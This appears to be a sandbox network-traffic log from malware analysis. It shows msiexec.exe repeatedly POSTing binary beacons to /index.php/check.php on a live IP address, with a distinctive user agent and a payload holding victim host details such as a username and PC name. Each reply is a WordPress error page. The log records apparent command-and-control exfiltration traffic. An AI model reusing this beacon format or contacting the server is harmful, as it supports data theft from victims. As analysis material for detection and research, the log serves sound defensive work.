                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:36.220072031 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:38.827873945 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:36 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.4 | 59094 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:38.970418930 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:38.975579023 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:41.575835943 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:39 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.4 | 59095 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:41.718657017 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:41.723886013 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:44.443887949 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:42 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.4 | 59096 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:44.598640919 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:44.604525089 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:47.324307919 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:45 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.4 | 59097 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:47.479007959 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:47.483918905 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:49.998955965 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:47 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.4 | 59098 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:50.173902035 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:50.178821087 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:53.439418077 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:50 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Oct 2, 2024 07:19:53.441025972 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:50 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.4 | 59099 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:53.589097977 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:53.593930006 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:56.225506067 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:54 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.4 | 59100 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:56.374245882 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:56.379219055 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:59.054563999 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:56 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:59.054970980 CEST | 224 | IN | Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:59.055191040 CEST | 1236 | IN | Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:59.056109905 CEST | 142 | IN | Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.4 | 59101 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:19:59.209873915 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:59.214833975 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:01.879544020 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:59 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:01.879966974 CEST | 1236 | IN | Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:01.879980087 CEST | 366 | IN | Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.2.4 | 59102 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:20:02.281871080 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:02.286811113 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:04.967272043 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:02 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.2.4 | 59103 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:20:05.117207050 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:05.122471094 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:07.737092972 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:05 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.4 | 59104 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:20:07.880738020 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:07.886271954 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:10.514827013 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:08 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.2.4 | 59105 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:20:10.660384893 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:10.665251017 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:13.219569921 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:11 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        22 | 192.168.2.4 | 59106 | 137.184.191.215 | 80 | 8076 | C:\Windows\SysWOW64\msiexec.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 2, 2024 07:20:13.361092091 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:13.365953922 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:16.036499023 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:13 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
